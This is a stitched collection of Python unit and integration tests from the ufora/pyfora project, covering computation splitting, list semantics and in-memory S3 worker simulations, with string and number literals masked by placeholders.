        self.assertTrue(splits is not None)

    def test_cfgSplitting_11(self):
        funString = "<STR_LIT>"
        cfg = self.parseStringToFunction(funString).toCFG(<NUM_LIT:1>)
        splits = ForaNative.splitControlFlowGraph(cfg, "<STR_LIT>")
        self.assertTrue(splits is not None)

    def test_cfgSplitting_12(self):
        funString = "<STR_LIT>"
        cfg = self.parseStringToFunction(funString).toCFG(<NUM_LIT:1>)
        splits = ForaNative.splitControlFlowGraph(cfg, "<STR_LIT>")
        self.assertTrue(splits is None)

    def test_cfgSplitting_13(self):
        funString = "<STR_LIT>"
        cfg = self.parseStringToFunction(funString).toCFG(<NUM_LIT:1>)
        splits = ForaNative.splitControlFlowGraph(cfg, "<STR_LIT>")
        self.assertTrue(splits is not None)

    def test_cfgSplitting_14(self):
        funString = "<STR_LIT>"
        cfg = self.parseStringToFunction(funString).toCFG(<NUM_LIT:1>)
        splits = ForaNative.splitControlFlowGraph(cfg, "<STR_LIT>")
        self.assertTrue(splits is not None)

    def test_cannotSplitThingsWithMutables(self):
        text = """<STR_LIT>"""
        funImplval = FORA.extractImplValContainer(FORA.eval(text))
        # Interrupt at increasing step counts; whenever a paused frame holds
        # a non-CST (mutable) value, splitting must refuse to produce a split.
        i = <NUM_LIT:0>
        while (i < <NUM_LIT>):
            i += <NUM_LIT:1000>
            try:
                pausedComputation = callAndExtractPausedCompuationAfterSteps(funImplval, i)
            except NotInterruptedException as e:
                # Computation finished before the interrupt -- nothing more to probe.
                break
            allAreCST = True
            for val in pausedComputation.frames[<NUM_LIT:0>].values:
                if not val.isCST():
                    allAreCST = False
                    break
            if not allAreCST:
                splitComputation = ForaNative.splitPausedComputation(pausedComputation)
                self.assertTrue(not splitComputation, splitComputation)

    def test_splitComputation_1(self):
        text = """<STR_LIT>"""
        funImplval = FORA.extractImplValContainer(FORA.eval(text))
        pausedComputation = callAndExtractPausedCompuationAfterSteps(funImplval, <NUM_LIT>)
        splitComputation = ForaNative.splitPausedComputation(pausedComputation)
        self.assertTrue(splitComputation is not None)

    def test_splitComputation_2(self):
        text = """<STR_LIT>"""
        funImplval = FORA.extractImplValContainer(FORA.eval(text))
        pausedComputation = callAndExtractPausedCompuationAfterSteps(funImplval, <NUM_LIT>)
        splitComputation = ForaNative.splitPausedComputation(pausedComputation)
        self.assertIsNotNone(splitComputation)
        # Finishing the split halves and rejoining them must reproduce the
        # value obtained by finishing the unsplit computation.
        unsplitValue = finishPausedComputation(pausedComputation)
        applyComputationVal = finishPausedComputation(splitComputation.applyComputation)
        splitComputationVal = finishPausedComputation(splitComputation.splitComputation)
        resumedComputation = ForaNative.joinSplitPausedComputation(
            splitComputation,
            applyComputationVal,
            splitComputationVal
            )
        finalSplitVal = finishPausedComputation(resumedComputation)
        self.assertEqual(unsplitValue, finalSplitVal)

    def randomSplitComputationTest(self, text):
        """Interrupt `text`'s evaluation at every step count up to a bound;
        wherever a split is possible, check split-finish-join equals the
        unsplit result."""
        if (isinstance(text, str)):
            funImplVal = FORA.extractImplValContainer(FORA.eval(text))
        else:
            # Already an impl-val container.
            funImplVal = text
        unsplitVal = callAndGetResult(funImplVal)
        splitAtLeastOne = False
        i = <NUM_LIT:0>
        while (i < <NUM_LIT>):
            i += <NUM_LIT:1>
            try:
                pausedComputation = callAndExtractPausedCompuationAfterSteps(funImplVal, i)
            except NotInterruptedException as e:
                break
            splitComputation = ForaNative.splitPausedComputation(pausedComputation)
            unsplitVal2 = finishPausedComputation(pausedComputation)
            self.assertEqual(unsplitVal, unsplitVal2)
            if (splitComputation):
                splitAtLeastOne = True
                applyComputationVal = finishPausedComputation(splitComputation.applyComputation)
                splitComputationVal = finishPausedComputation(splitComputation.splitComputation)
                resumedComputation = ForaNative.joinSplitPausedComputation(
                    splitComputation,
                    applyComputationVal,
                    splitComputationVal
                    )
                finalSplitVal = finishPausedComputation(resumedComputation)
                self.assertEqual(unsplitVal, finalSplitVal)
        if (not splitAtLeastOne):
            # Not a failure: the expression never offered a split point.
            logging.warn("<STR_LIT>" % (text, i))

    def disabled_randomSplitting_1(self):
        funString = """<STR_LIT>"""
        self.randomSplitComputationTest(funString)

    def test_randomSplitting_2(self):
        funString = """<STR_LIT>"""
        self.randomSplitComputationTest(funString)

    def test_randomSplitting_3(self):
        funString = """<STR_LIT>"""
        self.randomSplitComputationTest(funString)

    def test_randomSplitting_4(self):
        funString = """<STR_LIT>"""
        self.randomSplitComputationTest(funString)

    def test_randomSplitting_5(self):
        funString = """<STR_LIT>"""
        self.randomSplitComputationTest(funString)

    def test_randomSplitting_6(self):
        funString = """<STR_LIT>"""
        self.randomSplitComputationTest(funString)

    def test_randomSplitting_7(self):
        funString = """<STR_LIT>"""
        self.randomSplitComputationTest(funString)

    def test_randomSplitting_8(self):
        funString = """<STR_LIT>"""
        self.randomSplitComputationTest(funString)

    def test_randomSplitting_9(self):
        funString = """<STR_LIT>"""
        self.randomSplitComputationTest(funString)

    def test_randomSplitting_10(self):
        funString = """<STR_LIT>"""
        self.randomSplitComputationTest(funString)
<s> import ufora . config . Setup as Setup <EOL> _evaluator = None <EOL> def evaluator ( ) : <EOL> global _evaluator <EOL> if _evaluator is None : <EOL> assert False , "<STR_LIT>" <EOL> return _evaluator <EOL> def swapEvaluator ( newEvaluator ) : <EOL> """<STR_LIT>""" <EOL> global _evaluator <EOL> oldEval = _evaluator <EOL> _evaluator = newEvaluator <EOL> return oldEval <EOL> def initialize ( setupObjectToUse = None , useLocalEvaluator = True , vdmOverride = None ) : <EOL> global _evaluator <EOL> if _evaluator is not None : <EOL> return <EOL> import ufora . FORA . python . Evaluator . LocalEvaluator as LocalEvaluator <EOL> import ufora . FORA . python . Evaluator . CumulusEvaluator as CumulusEvaluator <EOL> if setupObjectToUse is None : <EOL> configToUse = Setup . config ( ) <EOL> else : <EOL> configToUse = setupObjectToUse . config <EOL> if useLocalEvaluator : <EOL> _evaluator = LocalEvaluator . defaultLocalEvaluator ( vdmOverride = vdmOverride ) <EOL> else : <EOL> import ufora . native . CallbackScheduler as CallbackSchedulerNative <EOL> schedulerFactory = CallbackSchedulerNative . createSimpleCallbackSchedulerFactory ( ) <EOL> _evaluator = CumulusEvaluator . CumulusEvaluator ( <EOL> schedulerFactory . createScheduler ( "<STR_LIT>" , <NUM_LIT:1> ) <EOL> ) <EOL> def isInitialized ( ) : <EOL> global _evaluator <EOL> return _evaluator is not None </s>
import time
import numpy
import pyfora.Exceptions as Exceptions


class ListTestCases(object):
    """Mixin of test cases exercising python list semantics under pyfora's
    python-to-FORA translation.  The host test class supplies
    equivalentEvaluationTest / evaluateWithExecutor and friends."""

    def test_handle_empty_list(self):
        def f():
            return []

        self.equivalentEvaluationTest(f)

    def test_list_str(self):
        t1 = (<NUM_LIT:2>, <NUM_LIT:2>)
        self.equivalentEvaluationTest(
            lambda: str(t1)
            )

    def test_return_list(self):
        def f():
            return [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>]

        self.equivalentEvaluationTest(f)

    def test_list_in_loop(self):
        # Builds a list by repeated concatenation, then sums it; the expected
        # total is the closed form ct*(ct-1)/2.
        def f(ct):
            ix = <NUM_LIT:0>
            l = []
            while ix < ct:
                l = l + [ix]
                ix = ix + <NUM_LIT:1>

            res = <NUM_LIT:0>
            for e in l:
                res = res + e
            return res

        ct = <NUM_LIT>
        res = self.evaluateWithExecutor(f, ct)
        self.assertEqual(res, ct * (ct - <NUM_LIT:1>) / <NUM_LIT:2>)

    def test_list_getitem_1(self):
        def f():
            l = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>]
            return l[<NUM_LIT:0>]

        self.equivalentEvaluationTest(f)

    def test_list_getitem_2(self):
        v = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>]
        def f(ix):
            return v[ix]

        # Includes negative indices to cover both indexing directions.
        for ix in range(-<NUM_LIT:3>, <NUM_LIT:3>):
            self.equivalentEvaluationTest(f, ix)

    def test_list_getitem_3(self):
        def nestedLists():
            x = [[<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>], [<NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>], [<NUM_LIT:7>, <NUM_LIT:8>, <NUM_LIT:9>]]
            return x[<NUM_LIT:0>][<NUM_LIT:0>]

        self.equivalentEvaluationTest(nestedLists)

    def test_list_len(self):
        # Deliberately exercises `is` on a small int as well as `==`; both
        # sides must agree with CPython's behavior.
        def f():
            l = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>]
            return (len(l), len(l) == <NUM_LIT:3>, len(l) is <NUM_LIT:3>)

        self.equivalentEvaluationTest(f)

    def test_long_list(self):
        t0 = time.time()

        l = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>] * <NUM_LIT>

        def f(x):
            return len(x)

        self.equivalentEvaluationTest(f, l)
        print "<STR_LIT>", time.time() - t0, "<STR_LIT>"

    def test_lists_3(self):
        def f(elt):
            x = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>]
            return x.index(elt)

        for ix in range(<NUM_LIT:1>, <NUM_LIT:4>):
            self.equivalentEvaluationTest(f, ix)

    def test_lists_6(self):
        v = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>]
        def f(val):
            return v.index(val)

        for ix in range(<NUM_LIT:1>, <NUM_LIT:4>):
            self.equivalentEvaluationTest(f, ix)

    def test_list_bound_methods_know_they_are_pyfora(self):
        def testFun():
            return [].__add__.__is_pyfora__

        self.assertTrue(self.evaluateWithExecutor(testFun))

    def test_listComprehensions_1(self):
        def listComprehensions_1():
            aList = [<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>]
            aList = [elt * <NUM_LIT:2> for elt in aList]
            return aList[-<NUM_LIT:1>]

        self.equivalentEvaluationTest(listComprehensions_1)

    def test_listComprehensions_2(self):
        def listComprehensions_2(arg):
            aList = range(<NUM_LIT:4>)
            filteredList = [elt for elt in aList if elt % <NUM_LIT:2> == <NUM_LIT:0>]
            return filteredList[arg]

        for ix in range(-<NUM_LIT:2>, <NUM_LIT:2>):
            self.equivalentEvaluationTest(listComprehensions_2, ix)

    def test_listComprehensions_3(self):
        def listComprehensions_3():
            aList = [(x, y) for x in [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>] for y in [<NUM_LIT:3>, <NUM_LIT:1>, <NUM_LIT:4>]]
            return aList[<NUM_LIT:1>][<NUM_LIT:0>]

        self.equivalentEvaluationTest(listComprehensions_3)

    def test_listComprehensions_4(self):
        def listComprehensions_4(arg):
            aList = [(x, y) for x in [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>] for y in [<NUM_LIT:3>, <NUM_LIT:1>, <NUM_LIT:4>] if x != y]
            return aList[arg]

        for ix in range(-<NUM_LIT:7>, <NUM_LIT:7>):
            self.equivalentEvaluationTest(listComprehensions_4, ix)

    def test_basicLists_1(self):
        def basicLists(x):
            aList = [x] + [x]
            return aList[<NUM_LIT:0>] + aList[<NUM_LIT:1>]

        self.equivalentEvaluationTest(basicLists, <NUM_LIT:1>)

    def test_lists_1(self):
        x = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>]

        def f(ix):
            return x[ix]

        for ix in range(-len(x), len(x)):
            self.equivalentEvaluationTest(f, ix)

    def test_lists_2(self):
        # Mixed list containing a user-defined class with custom __eq__.
        class C_lists:
            def __init__(self, x):
                self.x = x
            def __eq__(self, other):
                return self.x == other.x

        xs = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, C_lists(<NUM_LIT:3>)]

        def elt(ix):
            return xs[ix]

        for ix in range(-<NUM_LIT:4>, <NUM_LIT:4>):
            self.equivalentEvaluationTest(elt, ix)

    def test_listComprehensions_5(self):
        def listComprehensions_3(arg):
            aList = [(x, y) for x in [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>] for y in [<NUM_LIT:3>, <NUM_LIT:1>, <NUM_LIT:4>]]
            return aList[arg]

        for ix in range(-<NUM_LIT:9>, <NUM_LIT:9>):
            self.equivalentEvaluationTest(listComprehensions_3, ix)

    def test_listComprehensions_6(self):
        def listComprehensions_1(arg):
            aList = [<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>]
            aList = [elt * <NUM_LIT:2> for elt in aList]
            return aList[arg]

        for ix in range(-<NUM_LIT:4>, <NUM_LIT:4>):
            self.equivalentEvaluationTest(listComprehensions_1, ix)

    def test_nestedComprehensions_2(self):
        def nestedComprehensions():
            x = [[<NUM_LIT:1>, <NUM_LIT:2>], [<NUM_LIT:3>, <NUM_LIT:4>], [<NUM_LIT:5>, <NUM_LIT:6>]]
            res = [[row[ix] for row in x] for ix in [<NUM_LIT:0>, <NUM_LIT:1>]]
            return res[<NUM_LIT:0>][<NUM_LIT:0>]

        self.equivalentEvaluationTest(nestedComprehensions)

    def test_nestedLists_1(self):
        def nestedLists():
            x = [[<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>], [<NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>], [<NUM_LIT:7>, <NUM_LIT:8>, <NUM_LIT:9>]]
            return x[<NUM_LIT:0>][<NUM_LIT:0>]

        self.equivalentEvaluationTest(nestedLists)

    def test_list_containing_itself(self):
        # A self-referencing list cannot be converted; the conversion error
        # must carry a specific message.
        evilList = []
        evilList.append(evilList)
        try:
            self.equivalentEvaluationTest(lambda: len(evilList))
            self.assertTrue(False)
        except Exceptions.PythonToForaConversionError as e:
            self.assertIsInstance(e.message, str)
            self.assertEqual(
                e.message,
                "<STR_LIT>"
                )

    def test_nestedComprehensions_1(self):
        def nestedComprehensions():
            x = [[<NUM_LIT:1>, <NUM_LIT:2>], [<NUM_LIT:3>, <NUM_LIT:4>], [<NUM_LIT:5>, <NUM_LIT:6>]]
            res = [[row[ix] for row in x] for ix in [<NUM_LIT:0>, <NUM_LIT:1>]]
            return res[<NUM_LIT:0>][<NUM_LIT:0>]

        self.equivalentEvaluationTest(nestedComprehensions)

    def test_lists_plus_nonlists(self):
        # list + int raises TypeError in CPython; both sides must agree.
        def f():
            try:
                return [] + <NUM_LIT:10>
            except TypeError:
                return None

        self.equivalentEvaluationTestThatHandlesExceptions(f)

    def test_access_list_comprehension_variable_fails(self):
        # In pyfora the comprehension variable does not leak into the
        # enclosing scope, so accessing it is an invalid operation.
        def f():
            try:
                result = [x for x in range(<NUM_LIT:10>)]
                return x
            except Exception:
                return "<STR_LIT>"

        try:
            result = self.evaluateWithExecutor(f)
            self.assertTrue(False, result)
        except Exceptions.ComputationError as e:
            self.assertIsInstance(e.remoteException, Exceptions.InvalidPyforaOperation)

    def test_convertListOfTuple(self):
        x = [(<NUM_LIT:3>, <NUM_LIT:4>)]

        def returnX():
            return x

        self.equivalentEvaluationTest(returnX)

    def test_setitem_exception_is_meaningful(self):
        # Lists are immutable under pyfora; item assignment must produce a
        # ComputationError with a message and a trace.
        def f():
            l = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>]
            l[<NUM_LIT:0>] = <NUM_LIT:0>

        try:
            self.evaluateWithExecutor(f)
            self.assertTrue(False)
        except Exceptions.ComputationError as e:
            self.assertIsInstance(e.message, str)
            self.assertTrue(e.trace is not None)

    def test_holding_a_mappable_1(self):
        # A list holding a builtin function object.
        x = [len]
        def f():
            return x

        self.equivalentEvaluationTest(f)

    def test_holding_a_mappable_2(self):
        # A list holding a numpy array.
        y = numpy.array(range(<NUM_LIT:5>))
        x = [y]
        def f():
            return x[<NUM_LIT:0>]

        self.equivalentEvaluationTest(f)

    def test_large_lists_of_tuples_correct(self):
        def f():
            return [(x, x + <NUM_LIT:1>) for x in xrange(<NUM_LIT>)]

        self.equivalentEvaluationTest(f)
<s> def convertableMember ( x ) : <EOL> return x * <NUM_LIT:2> <EOL> def unconvertableMember ( x ) : <EOL> x += <NUM_LIT:2> <EOL> x = x // <NUM_LIT:2> </s>
<s> import unittest <EOL> import ufora . native . FORA as ForaNative <EOL> import logging <EOL> class TestRandomWhitespaceInserter ( unittest . TestCase ) : <EOL> def test_1 ( self ) : <EOL> toParse = """<STR_LIT>""" <EOL> simpleParse1 = ForaNative . SimpleParseNode . parse ( toParse ) <EOL> whitespaceInserter = ForaNative . RandomWhitespaceInserter ( <NUM_LIT> ) <EOL> withWhitespace = whitespaceInserter . stringifyWithRandomWhitespaceAndComments ( simpleParse1 ) <EOL> simpleParse2 = ForaNative . SimpleParseNode . parse ( withWhitespace ) <EOL> self . assertEqual ( str ( simpleParse1 ) , str ( simpleParse2 ) ) <EOL> withWhitespace2 = whitespaceInserter . stringifyWithRandomWhitespaceAndComments ( simpleParse2 ) <EOL> self . assertNotEqual ( withWhitespace2 , withWhitespace ) <EOL> simpleParse2 = ForaNative . SimpleParseNode . parse ( withWhitespace2 ) <EOL> self . assertEqual ( str ( simpleParse1 ) , str ( simpleParse2 ) ) </s>
<s> import unittest <EOL> import time <EOL> import logging <EOL> import numpy <EOL> import ufora . native . Cumulus as CumulusNative <EOL> import ufora . cumulus . test . InMemoryCumulusSimulation as InMemoryCumulusSimulation <EOL> import ufora . distributed . S3 . InMemoryS3Interface as InMemoryS3Interface <EOL> import ufora . native . TCMalloc as TCMallocNative <EOL> import ufora . native . CallbackScheduler as CallbackScheduler <EOL> import ufora . test . PerformanceTestReporter as PerformanceTestReporter <EOL> import cPickle as pickle <EOL> callbackScheduler = CallbackScheduler . singletonForTesting ( ) <EOL> class CumulusWorkerDatasetLoadServiceIntegrationTest ( unittest . TestCase ) : <EOL> def assertBecomesTrueEventually ( self , f , timeout , msgFun ) : <EOL> t0 = time . time ( ) <EOL> while not f ( ) : <EOL> time . sleep ( <NUM_LIT> ) <EOL> if time . time ( ) - t0 > timeout : <EOL> self . assertTrue ( False , msgFun ( ) ) <EOL> def computeUsingSeveralWorkers ( self , * args , ** kwds ) : <EOL> return InMemoryCumulusSimulation . computeUsingSeveralWorkers ( * args , ** kwds ) <EOL> def test_PythonIoTaskService ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> for ix1 in range ( <NUM_LIT:20> ) : <EOL> for ix2 in range ( <NUM_LIT:20> ) : <EOL> s3 ( ) . setKeyValue ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" % ( ix1 , ix2 ) , <EOL> "<STR_LIT>" . join ( <EOL> ( "<STR_LIT>" % ( ix1 , ix2 , ix3 ) for ix3 in range ( <NUM_LIT> ) ) <EOL> ) <EOL> ) <EOL> text = """<STR_LIT>""" <EOL> self . assertIsNotNone ( self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:1> ) ) <EOL> def test_PythonIoTaskService2 ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> for ix1 in range ( <NUM_LIT:20> ) : <EOL> for ix2 in range ( <NUM_LIT:20> ) : <EOL> s3 ( ) . setKeyValue ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" % ( ix1 , ix2 ) , <EOL> "<STR_LIT>" . 
join ( <EOL> ( "<STR_LIT>" % ( ix1 , ix2 , ix3 ) for ix3 in range ( <NUM_LIT> ) ) <EOL> ) <EOL> ) <EOL> text = """<STR_LIT>""" <EOL> self . assertIsNotNone ( self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:1> ) ) <EOL> def test_PythonIoTaskService3 ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> s3 . setThroughputPerMachine ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT:20> ) <EOL> for ix in range ( <NUM_LIT> ) : <EOL> s3 ( ) . setKeyValue ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" % ix , <EOL> "<STR_LIT:U+0020>" * <NUM_LIT:10> * <NUM_LIT> * <NUM_LIT> <EOL> ) <EOL> text = """<STR_LIT>""" <EOL> self . assertIsNotNone ( self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> , blockUntilConnected = True ) ) <EOL> totalBytecount = <NUM_LIT:0> <EOL> for machine , bytecount in s3 . getPerMachineBytecounts ( ) . iteritems ( ) : <EOL> totalBytecount += bytecount <EOL> self . assertTrue ( totalBytecount / <NUM_LIT> / <NUM_LIT> <= <NUM_LIT> , totalBytecount / <NUM_LIT> / <NUM_LIT> ) <EOL> def test_PythonIoTaskServiceInLoop ( self ) : <EOL> bytesUsed = [ ] <EOL> for ix in range ( <NUM_LIT:20> ) : <EOL> bytesUsed . append ( TCMallocNative . getMemoryStat ( "<STR_LIT>" ) / <NUM_LIT> / <NUM_LIT> ) <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> s3 . setThroughputPerMachine ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT:20> ) <EOL> for ix in range ( <NUM_LIT> ) : <EOL> s3 ( ) . setKeyValue ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" % ix , <EOL> "<STR_LIT:U+0020>" * <NUM_LIT:10> * <NUM_LIT> * <NUM_LIT> <EOL> ) <EOL> text = """<STR_LIT>""" <EOL> self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> , blockUntilConnected = True ) <EOL> self . assertTrue ( bytesUsed [ <NUM_LIT:0> ] < bytesUsed [ - <NUM_LIT:1> ] - <NUM_LIT:100> , bytesUsed ) <EOL> def test_CalculationRicochet ( self ) : <EOL> s3 = InMemoryS3Interface . 
InMemoryS3InterfaceFactory ( ) <EOL> text = """<STR_LIT>""" <EOL> vResult , sim = InMemoryCumulusSimulation . computeUsingSeveralWorkers ( <EOL> "<STR_LIT>" , <EOL> s3 , <EOL> <NUM_LIT:4> , <EOL> timeout = <NUM_LIT> , <EOL> memoryLimitMb = <NUM_LIT> , <EOL> threadCount = <NUM_LIT:1> , <EOL> useInMemoryCache = True , <EOL> returnSimulation = True <EOL> ) <EOL> try : <EOL> v = vResult . asResult . result <EOL> t0 = time . time ( ) <EOL> sim . compute ( text . replace ( "<STR_LIT>" , "<STR_LIT:1>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) , timeout = <NUM_LIT> , v = v ) <EOL> PerformanceTestReporter . recordTest ( "<STR_LIT>" , time . time ( ) - t0 , None ) <EOL> t0 = time . time ( ) <EOL> sim . compute ( text . replace ( "<STR_LIT>" , "<STR_LIT:2>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) , timeout = <NUM_LIT> , v = v ) <EOL> PerformanceTestReporter . recordTest ( "<STR_LIT>" , time . time ( ) - t0 , None ) <EOL> finally : <EOL> sim . teardown ( ) <EOL> def dataCreationTest ( self , totalMB , workers = <NUM_LIT:1> , threadsPerWorker = <NUM_LIT:4> ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> text = """<STR_LIT>""" % ( totalMB * <NUM_LIT> * <NUM_LIT> / <NUM_LIT:8> ) <EOL> self . assertIsNotNone ( <EOL> self . computeUsingSeveralWorkers ( <EOL> text , <EOL> s3 , <EOL> workers , <EOL> timeout = <NUM_LIT> , <EOL> memoryLimitMb = totalMB / workers * <NUM_LIT> , <EOL> threadCount = threadsPerWorker , <EOL> useInMemoryCache = False <EOL> ) <EOL> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_createData_500_1 ( self ) : <EOL> self . dataCreationTest ( <NUM_LIT> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_createData_1000_1 ( self ) : <EOL> self . dataCreationTest ( <NUM_LIT:1000> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_createData_2000_1 ( self ) : <EOL> self . dataCreationTest ( <NUM_LIT> ) <EOL> @ PerformanceTestReporter . 
PerfTest ( "<STR_LIT>" ) <EOL> def test_createData_500_2 ( self ) : <EOL> self . dataCreationTest ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_createData_1000_2 ( self ) : <EOL> self . dataCreationTest ( <NUM_LIT:1000> , <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_createData_2000_2 ( self ) : <EOL> self . dataCreationTest ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_DataFanout ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> text = """<STR_LIT>""" <EOL> self . assertIsNotNone ( self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , timeout = <NUM_LIT> ) ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_LargeCSVParse ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> for ix1 in range ( <NUM_LIT:10> ) : <EOL> s3 ( ) . setKeyValue ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" % ix1 , <EOL> "<STR_LIT>" . join ( <EOL> ( "<STR_LIT>" % ( ix1 , ix2 , ix1 * ix2 ) for ix2 in range ( <NUM_LIT> ) ) <EOL> ) <EOL> ) <EOL> text = """<STR_LIT>""" <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , memoryLimitMb = <NUM_LIT> , timeout = <NUM_LIT> ) <EOL> self . assertTrue ( res . isResult ( ) , res ) <EOL> self . assertEqual ( res . asResult . result . pyval , <NUM_LIT:10> * <NUM_LIT> ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_CreateManySmallVectors ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> text = """<STR_LIT>""" <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> ) <EOL> self . assertTrue ( res . isResult ( ) ) <EOL> self . assertEqual ( res . asResult . result . pyval , <NUM_LIT> ) <EOL> def test_CalculateWithCachecallsFirst ( self ) : <EOL> s3 = InMemoryS3Interface . 
InMemoryS3InterfaceFactory ( ) <EOL> text = """<STR_LIT>""" <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , timeout = <NUM_LIT:30> ) <EOL> self . assertIsNotNone ( res ) <EOL> self . assertTrue ( res . isResult ( ) ) <EOL> self . assertEqual ( res . asResult . result . pyval , "<STR_LIT:OK>" ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_CachecallsAndVectors ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> text = """<STR_LIT>""" <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , timeout = <NUM_LIT:20> ) <EOL> self . assertTrue ( res . isResult ( ) ) <EOL> self . assertEqual ( res . asResult . result . pyval , "<STR_LIT:OK>" ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_VectorsAndSums ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> text = """<STR_LIT>""" <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , timeout = <NUM_LIT:20> ) <EOL> self . assertTrue ( res . isResult ( ) , res ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_ParseRowsAsFloatVectors ( self ) : <EOL> s3 = InMemoryS3Interface . InMemoryS3InterfaceFactory ( ) <EOL> rows = <NUM_LIT> <EOL> bucketData = "<STR_LIT:\n>" . join ( <EOL> [ "<STR_LIT:U+002C>" . join ( [ str ( ( ( x * row ) ** <NUM_LIT:2> ) % <NUM_LIT> ) for x in range ( <NUM_LIT:200> ) ] ) for row in range ( rows ) ] <EOL> ) <EOL> s3 ( ) . setKeyValue ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:key>" , <EOL> bucketData <EOL> ) <EOL> text = """<STR_LIT>""" <EOL> res = self . computeUsingSeveralWorkers ( text , s3 , <NUM_LIT:4> , timeout = <NUM_LIT:30> ) <EOL> self . assertTrue ( res . isResult ( ) , res ) <EOL> self . assertEqual ( res . asResult . result . pyval , rows ) <EOL> @ PerformanceTestReporter . PerfTest ( "<STR_LIT>" ) <EOL> def test_ParseRowsAsFloatTuples ( self ) : <EOL> s3 = InMemoryS3Interface . 
